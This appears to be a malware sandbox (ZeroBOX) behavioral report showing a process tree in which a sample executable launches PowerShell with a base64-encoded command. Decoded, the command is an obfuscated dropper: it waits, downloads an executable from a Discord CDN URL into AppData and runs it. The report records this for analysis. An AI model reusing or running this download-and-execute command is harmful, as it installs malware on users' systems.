| ZeroBOX

Behavioral Analysis

Process tree

  • 8.exe "C:\Users\test22\AppData\Local\Temp\8.exe"

    1460
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAegBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAOAA0ADkAMQAwADEAOQA3ADcAMQA5ADQANAA5ADcAMwAzAC8AMQAwADgANAA5ADEAMAA0ADgAOQAzADIAMAAwADQANgA2ADQAMgAvAGUAbgBlAHMALgBlAHgAZQAnACwAIAA8ACMAeQBlAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAGgAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGMAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AC4AZQB4AGUAJwApACkAPAAjAHgAZQBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGgAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AC4AZQB4AGUAJwApADwAIwBlAHIAbgAjAD4A"

      2212

Process contents

No process loaded Click on a process in the tree above to load its data.